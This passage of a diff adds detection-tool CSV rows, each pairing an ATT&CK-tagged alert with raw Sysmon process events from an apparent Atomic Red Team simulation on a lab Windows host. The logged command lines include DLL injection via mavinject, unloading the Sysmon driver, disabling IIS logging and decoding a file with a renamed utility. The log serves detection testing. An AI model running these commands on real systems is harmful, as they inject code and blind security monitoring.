+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.174</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C09D3E00</Data>
+    <Data Name=""ProcessId"">3224</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.073651Z"">
+    </TimeCreated>
+    <EventRecordID>4082</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.051</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010B2953E00</Data>
+    <Data Name=""ProcessId"">5036</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:16.552097Z"">
+    </TimeCreated>
+    <EventRecordID>4080</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:16.531</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-001077603D00</Data>
+    <Data Name=""ProcessId"">6172</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:16.496455Z"">
+    </TimeCreated>
+    <EventRecordID>4079</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:16.477</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-0010655D3D00</Data>
+    <Data Name=""ProcessId"">2596</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( &quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:15.776993Z"">
+    </TimeCreated>
+    <EventRecordID>4078</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:15.754</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4B-5D31-0000-0010CB413D00</Data>
+    <Data Name=""ProcessId"">2604</Data>
+    <Data Name=""Image"">C:\Windows\System32\mavinject.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft Application Virtualization Injector</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:14.991615Z"">
+    </TimeCreated>
+    <EventRecordID>4077</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:14.972</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00107A2C3D00</Data>
+    <Data Name=""ProcessId"">2584</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:14.944276Z"">
+    </TimeCreated>
+    <EventRecordID>4076</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:14.928</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00106C293D00</Data>
+    <Data Name=""ProcessId"">4056</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:14.758535Z"">
+    </TimeCreated>
+    <EventRecordID>4075</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:14.745</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010EE223D00</Data>
+    <Data Name=""ProcessId"">1012</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:14.715974Z"">
+    </TimeCreated>
+    <EventRecordID>4074</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:14.696</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010C21F3D00</Data>
+    <Data Name=""ProcessId"">3976</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;fltmc.exe unload SysmonDrv&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.643015Z"">
+    </TimeCreated>
+    <EventRecordID>4073</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:04.529</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010E16B3C00</Data>
+    <Data Name=""ProcessId"">264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.361122Z"">
+    </TimeCreated>
+    <EventRecordID>4069</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:04.346</Data>
